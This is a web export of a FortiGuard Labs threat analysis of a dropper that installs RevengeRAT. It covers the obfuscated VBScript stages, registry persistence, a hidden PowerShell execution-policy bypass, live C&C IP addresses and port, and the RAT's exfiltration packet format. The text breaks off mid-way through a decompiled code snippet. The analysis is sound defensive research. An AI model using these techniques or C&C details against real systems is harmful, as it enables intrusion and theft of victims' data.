{"id":16883,"date":"2019-11-13T15:40:02","date_gmt":"2019-11-13T23:40:02","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2019\/11\/13\/news-10621\/"},"modified":"2019-11-13T15:40:02","modified_gmt":"2019-11-13T23:40:02","slug":"news-10621","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2019\/11\/13\/news-10621\/","title":{"rendered":"Double Trouble:  RevengeRAT and WSHRAT"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><i>A FortiGuard Labs Threat Analysis Report<\/i><\/b><\/p>\n<p>As part of our continuous malware monitoring, the FortiGuard Labs team recently captured a <a href=\"https:\/\/www.virustotal.com\/gui\/file\/35c0980e99987f4418c8d186b9d5514c340c05ec0470c485182d24868f2a37db\/detection\">sample<\/a> file that our <i>EagleSight Malware Analysis System<\/i> flagged as suspicious. We also noticed that this malware had a low detection rate, as shown below. As a result, we decided to perform a manual analysis on it, and we discovered that the file was designed to drop malware. We then detected it dropping both RevengeRAT and WSHRAT.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1337821993.img.png\/1573604360030\/revengerat-one.png\" alt=\"revengerat sample\"\/>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>First Stage \u2013 Launcher\/Dropper<\/h2>\n<p>When opening the sample file, which contained JavaScript code in a text editor, we could see that it contained URL-encoded data. Once it\u2019s decoded, we were able to uncover VBScript code. The author of this malware used simple character replacement when calling the \u201cChr()\u201d function in an attempt to hide the actual strings (\u201c<b>shell.application<\/b>\u201d and \u201c<b>cmd \/c cd %temp%<\/b>\u201d, respectively).<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1779882811.img.png\/1573604391748\/revengerat-two.png\" alt=\"Figure 1 \u2013 VBScript Code\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1 \u2013 VBScript Code<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The objectives of the VBScript code are as follows:<\/p>\n<ol>\n<li>Create a new Shell.Application object<\/li>\n<li>Call the ShellExecute() function, which eventually generates a new file with the hardcoded filename of \u201cA6p.vbs\u201d<\/li>\n<li>Execute the newly-created script file \u201cA6p.vbs\u201d<\/li>\n<li>Pause the CMD command execution for 13 seconds (by calling the timeout.exe program)<\/li>\n<li>Delete the script file \u201cA6p.vbs\u201d<\/li>\n<li>Execute the downloaded script file \u201cMicrosoft.vbs\u201d<\/li>\n<li>Close the current\/active window<\/li>\n<\/ol><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1095175056.img.png\/1573604417171\/revengerat-three.png\" alt=\"Figure 2 \u2013 1st Stage Launcher\/Dropper Execution\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2 \u2013 1st Stage Launcher\/Dropper Execution<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Second Stage \u2013 Downloader<\/h2>\n<p>The purpose of the \u201cA6p.vbs\u201d file is to fetch a resource (an additional VBScript) from an external website. The code uses obfuscated strings, presumably to avoid detection. The malware writer then uses a function (H9a) to reveal those strings. This is used for both creating objects (<b>MSXML2.XMLHTTP<\/b> and <b>ADODB.STREAM<\/b>) and getting regular strings, such as <b>MICROSOFT.VBS<\/b>.<\/p>\n<h2>Script Analysis (MICROSOFT.VBS)<\/h2>\n<p>Once the script \u201cA6p.vbs\u201d is executed, it downloads the script file \u201cMicrosoft.vbs\u201d from its remote server.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1580760685.img.png\/1573604436596\/revengerat-four.png\" alt=\"Figure 3 \u2013Downloader Script (A6p.vbs)\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3 \u2013Downloader Script (A6p.vbs)<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The file is saved as \u201cMICROSOFT.VBS\u201d in the %TEMP% folder. The VBScript code is composed with a main class called \u201cth3m41n\u201d, using three methods (\u201cdugh41r\u201d, \u201ct01l3t\u201d, and \u201cb3st1n\u201d). The purpose of the entire code of \u201cMICROSOFT.VBS\u201d is to reconstruct an XML-based structure by invoking the creation of a <b>Microsoft.XMLDOM<\/b> object, passing it through decoding layers between the different class methods, and finally executing the base64-encoded data by making a final call to the VBScript\u2019s \u201c<b>ExecuteGlobal<\/b>()\u201d function.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn aem-GridColumn--default--12\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_958039499.img.png\/1573604456525\/revengerat-five.png\" alt=\"Figure 4 \u2013 MICROSOFT.VBS and its decoded Base64 data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4 \u2013 MICROSOFT.VBS and its decoded Base64 data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Script Analysis (MICROSOFT.VBS \u2013 Decoded Base64 Data)<\/h2>\n<p>The script makes use of two functions: <b>writeBytes()<\/b> \u2013 which creates an <b>ADODB.Stream<\/b> object to write binary data into a given file for an arbitrary number of bytes, and <b>decodebase64()<\/b> \u2013 which creates a\u00a0<b>Microsoft.XMLDOM<\/b> object to create a temporary XML element to store base64-encoded data and then eventually decode it.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1010441325.img.png\/1573604500423\/rat-six-seven.png\" alt=\"Figure 5 \u2013 writeBytes() and decodebase64() functions\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5 \u2013 writeBytes() and decodebase64() functions<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The most notable data holders are two local variables. One, named \u201c<b>longText1<\/b>\u201d, contains base64-encoded VBScript data, which is a partial copy of \u201cMICROSOFT.VBS\u201d since the base64 data (line 32) differs from the downloaded file. Another variable is named \u201c<b>H<\/b>\u201d, which holds the data of a .NET assembly executable. It is also apparent that malware writers added garbage code in an attempt to delay analysis.<\/p>\n<p>Once the aforementioned code is executed, it creates a new <i>WScript.Shell<\/i> object and collects OS environment and hardcoded data, which will eventually end in running the newly created script (GXxdZDvzyH.vbs) by calling the VBScript interpreter with the \u201c<b>\/\/B<\/b>\u201d parameter. This enables \u201cbatch-mode\u201d and disables any potential warnings or alerts that can occur during execution.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_717352251.img.png\/1573604520688\/revengerat-eight.png\" alt=\"Figure 6 \u2013 GXxdZDvzyH.vbs generation and execution\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 6 \u2013 GXxdZDvzyH.vbs generation and execution<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>We will discuss the characteristics and actions performed by this sample further in this blog post.<\/p>\n<p>During the script\u2019s execution, a new key is added into the Windows Registry (HKCUMicrosoft SoftwareMicrosoft) called \u201cmicrosoft\u201d, which stores arbitrarily malformed base64-encoded data. This data will be fixed later using a PowerShell command, and the script\u2019s execution ends by replacing \u201c@\u201d with \u201c0\u201d.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_943474662.img.png\/1573604569952\/revengerat-nine.png\" alt=\"Figure 7 \u2013 Malformed base64 data\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 7 \u2013 Malformed base64 data<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Executing Revenge RAT and Persistency<\/h2>\n<p>The script properly invokes a number of composed PowerShell commands to bypass the interpreter\u2019s execution policy and to hide its presence, thereby bypassing the \u201c<b>-ExecutionPolicy Bypass -windowstyle hidden -noexit -Command<\/b>\u201d parameters.<\/p>\n<p>The following table shows the command-line arguments passed to the PowerShell interpreter while the script is in execution, along with the purpose of each argument.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--11 aem-GridColumn--offset--default--0\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1531907796.img.png\/1573604606720\/revengerat-ten.png\" alt=\"revenge-rat-table\"\/>         <\/noscript>                   <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Connecting to the C&amp;C Server<\/h2>\n<p>As mentioned earlier, a new thread was created and a .NET Assembly was loaded and executed.\u00a0 We managed to dump it from the Windows Registry into an executable (<b>e3edfe91e99ba731e58fc2ad33f2fd11<\/b>) to provide a better overview of the payload.<\/p>\n<p>The screenshot below shows the basic information of this .exe file.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1556786446.img.png\/1573604634502\/revengerat-eleven.png\" alt=\"Figure 8 - Dropped exe file\u2019s basic information\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 8 &#8211; Dropped exe file\u2019s basic information<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>When this sample gets executed in a .NET debugger \u2013 dnSpy, its code is not like other malicious software that uses obfuscated code. Instead, its code is very clear and simple.<\/p>\n<p>Once the RAT runs, it connects to two C&amp;C servers, whose IP addresses and Ports are assigned in the main class\u2019 construction function. The IP addresses are \u201c193.56.28.134\u201d and \u201c185.84.181.102\u201d. The Port numbers are both \u201c5478\u201d. This is a screenshot of that class construction function where several variables are initialized, including the C&amp;C IP address and Port:<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image.img.png\/1573604667358\/revengerat-twelve.png\" alt=\"Figure 9 - C&amp;C server\u2019s IP address and port number\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 9 &#8211; C&amp;C server\u2019s IP address and port number<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Just as we started analyzing this malware, unfortunately, the two C&amp;C servers had been shut down. However, the malware kept trying to make connections to the two IP addresses until one connection was established. So to continue to analyze this malware we had to install a fake C&amp;C server using Netcat in the victim machine. To do that, we also modified the C&amp;C server IP address as \u201c127.0.0.1\u201d at the moment it connected.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn--default--9 aem-GridColumn aem-GridColumn--offset--default--1\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/malware-analysis-revenge-rat-sample\/_jcr_content\/root\/responsivegrid\/image_1059192917.img.png\/1573604694566\/revengerat-thirteen.png\" alt=\"Figure 10 \u2013 The C&amp;C server\u2019s changed IP address\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 10 \u2013 The C&amp;C server\u2019s changed IP address<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<h2>Reporting the Collected Information<\/h2>\n<p>Once the connection to the C&amp;C server is established, it collects information from the victim\u2019s system that will be sent to its server. From our analysis, each packet between the victim and server consists of several parts, which are: magic string command, data fields corresponding to the command, a separator, and end magic string. \u00a0<\/p>\n<p>\u201cachillepower\u201d is defined as separator to split each data in a packet.<\/p>\n<p>\u201c*-]NK[-*\u201d is defined as packet end magic string.<\/p>\n<p>Now, let\u2019s examine the first packet containing what the malware was able to collect from the victim\u2019s system.<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--11 aem-GridColumn--offset--default--1\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: black; background: #D9D9D9;\">Information<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">SG91c2U=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">XzU4MUYxMDkz<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">10.0.2.15<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">TTBZ<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: black; background: #D9D9D9;\">VEVTMEVOVi1QQyAvIE0wWVRlczBFbnY=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">No<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">TWljcm9zb2Z0IFdpbmRvd3MgNyB<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: black; background: #D9D9D9;\">VbHRpbWF0ZSAgMzI=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">SW50ZWwoUikgQ29yZShUTSkgaTctNjcwMCBDUFUgQCAzLjQwR0h6<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">3757629440<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">TWljcm9zb2Z0IFNlY3VyaXR5IEVzc2VudGlhbHM=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">Ti9B<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">5478<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">ZG5TcHkgdjYuMC40ICgzMi1iaXQsIC5ORVQgQ29yZSwgRGVidWdnaW5nK<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: black; background: #D9D9D9;\">Q==<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">ZW4tVVM=<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">achillepower<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">False<\/span><\/em><em><span style=\"color: red; background: #D9D9D9;\">*-]NK[-*<\/span><\/em><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>As you can easily see, the first packet is split into 15 blocks by the separator. And most of them are base64 encoded. Next, we\u2019ll explain each part and decode the base64 string if needed.<\/p>\n<ul>\n<li>\u201c<b>Information<\/b>\u201d is the command magic string, which always is the first part of a packet.<\/li>\n<li>\u201c<b>SG91c2U=<\/b>\u201d is decoded as \u201cHouse\u201d.<\/li>\n<li>\u201c<b>XzU4MUYxMDkz<\/b>\u201d is decoded as \u201c_581F1093\u201d, which is the Volume Information.<\/li>\n<li>\u201c<b>10.0.2.15<\/b>\u201d is the IP address of victim\u2019s machine.<\/li>\n<li>\u201c<b>TTBZVEVTMEVOVi1QQyAvIE0wWVRlczBFbnY=<\/b>\u201d is decoded as \u201cM0YTES0ENV-PC \/ M0YTes0Env\u201d, which is the victim\u2019s machine name\u00a0and UserName.<\/li>\n<li>\u201c<b>No<\/b>\u201d identifies whether the victim has a webcam.<\/li>\n<li>\u201c<b>TWljcm9zb2Z0IFdpbmRvd3MgNyBVbHRpbWF0ZSAgMzI=<\/b>\u201d is decoded as \u201cMicrosoft Windows 7 Ultimate 32\u201d, which is the victim\u2019s Windows system information.<\/li>\n<li>\u201c<b>SW50ZWwoUikgQ29yZShUTSkgaTctNjcwMCBDUFUgQCAzLjQwR0h6<\/b>\u201d is decoded as \u201cIntel(R) Core(TM) i7-6700 CPU @ 3.40GHz\u201d, which is the CPU information.<\/li>\n<li>\u201c<b>3757629440<\/b>\u201d is the total capacity of victim\u2019s physical memory.<\/li>\n<li>\u201c<b>TWljcm9zb2Z0IFNlY3VyaXR5IEVzc2VudGlhbHM=<\/b>\u201d is decoded as \u201cMicrosoft Security Essentials\u201d, which should be the installed anti-virus product.<\/li>\n<li>\u201c<b>Ti9B<\/b>\u201d is decoded as \u201cN\/A\u201d, which should be the installed Firewall product.<\/li>\n<li>\u201c<b>5478<\/b>\u201d is the port number of the C&amp;C server it is connecting to.<\/li>\n<li>\u201c<b>ZG5TcHkgdjYuMC40ICgzMi1iaXQsIC5ORVQgQ29yZSwgRGVidWdnaW5nKQ==<\/b>\u201d is decoded as \u201cdnSpy v6.0.4 (32-bit, .NET Core, Debugging)\u201d, which is the title of top-most window. As you can see, it is the title of dnSpy debugger, which could be Word, Chrome, etc. on real victim\u2019s system.<\/li>\n<li>\u201c<b>ZW4tVVM=<\/b>\u201d is decoded as \u201cen-US\u201d, which is the language used on victim machine.<\/li>\n<li>\u201c<b>False<\/b>\u201d is a hard-coded value.<\/li>\n<\/ul>\n<p>Below is the code snippet used to generate above packet. (Atomic.Key is the separator \u201cachillepower\u201d)<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--11 aem-GridColumn--offset--default--1\">\n<div class=\"text-container\">\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #2b91af; background: #D9D9D9;\">NewLateBinding<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">LateCall<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">this<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">,&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">null<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">,&nbsp;<\/span><\/em><em><span style=\"color: #a31515; background: #D9D9D9;\">&#8220;Send&#8221;<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">,&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">new<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">&nbsp;<\/span><\/em><em><span style=\"color: blue; background: #D9D9D9;\">object<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">[]<br \/>{<br \/><\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">C<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #880000; background: #D9D9D9;\">oncatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateO<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #880000; background: #D9D9D9;\">bject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operat<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #2b91af; background: #D9D9D9;\">ors<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">Concaten<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #880000; background: #D9D9D9;\">ateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">O<\/span><\/em><\/p>\n<p style=\"margin: 0in 0in 0.0001pt; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif;\"><em><span style=\"color: #2b91af; background: #D9D9D9;\">perators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: #D9D9D9;\">Operators<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">.<\/span><\/em><em><span style=\"color: #880000; background: #D9D9D9;\">ConcatenateObject<\/span><\/em><em><span style=\"color: black; background: #D9D9D9;\">(<\/span><\/em><em><span style=\"color: #2b91af; background: 